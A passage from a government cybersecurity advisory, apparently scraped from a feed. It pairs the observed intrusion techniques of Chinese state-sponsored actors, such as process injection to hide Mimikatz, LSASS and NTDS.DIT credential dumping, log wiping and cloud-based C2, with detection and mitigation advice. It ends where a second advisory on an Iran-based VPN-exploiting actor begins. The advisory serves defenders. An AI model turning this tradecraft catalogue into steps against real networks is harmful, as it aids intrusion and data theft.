opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. \n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] \n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n![](/sites/default/files/publications/TTPs_Figure2.PNG)\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:30:10", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access 